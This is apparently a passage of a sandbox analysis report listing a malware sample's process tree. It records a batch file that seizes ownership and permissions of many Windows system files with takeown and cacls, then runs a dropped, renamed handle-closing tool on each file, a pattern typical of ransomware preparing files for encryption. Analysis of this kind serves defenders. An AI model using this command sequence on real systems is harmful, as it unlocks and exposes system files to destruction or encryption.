      PID:2256
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl""
  2⤵
  PID:2568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" /E /G Admin:F /C
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" -nobanner
    3⤵
    PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.149aac4e-54b3-4e31-b9b5-16efa4a232d5.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:3988
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2728
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:64
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl""
  2⤵
  PID:4604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" /E /G Admin:F /C
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl"
    3⤵
    - Modifies file permissions
    PID:2188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" -nobanner
    3⤵
    PID:2648
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "NotificationUxBroker.9237b7f8-28ea-45ee-94ad-90ad8ee2b65b.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:4992
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl""
  2⤵
  PID:4388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" /E /G Admin:F /C
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl"
    3⤵
    - Modifies file permissions
    PID:4812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" -nobanner
    3⤵
    PID:4584
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "NotificationUxBroker.f514204f-d859-4c91-ba1b-f89b894b3e39.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:2740
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:3636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:4088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4360
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3672
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:1820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2008
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4352
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:1792
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:3608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1248
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:296
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:3948
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl""
  2⤵
  PID:4236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" /E /G Admin:F /C
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl"
    3⤵
    - Modifies file permissions
    PID:100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" -nobanner
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "UpdateSessionOrchestration.d91e48b2-65a9-48ba-85ad-a662e059bdb0.1.etl" -nobanner
      4⤵
      PID:4584
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4208
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl""
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" /E /G Admin:F /C
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl"
    3⤵
    - Modifies file permissions
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" -nobanner
    3⤵
    PID:3404
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "WuProvider.802cee16-994e-416e-81f5-611b64c36bf0.1.etl" -nobanner
      4⤵
      PID:2356
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:3384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:2308
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:284
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:292
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:1500
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:3068
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:60
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:4716
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:384
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:3200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:1784
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4352
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\cacls.exe
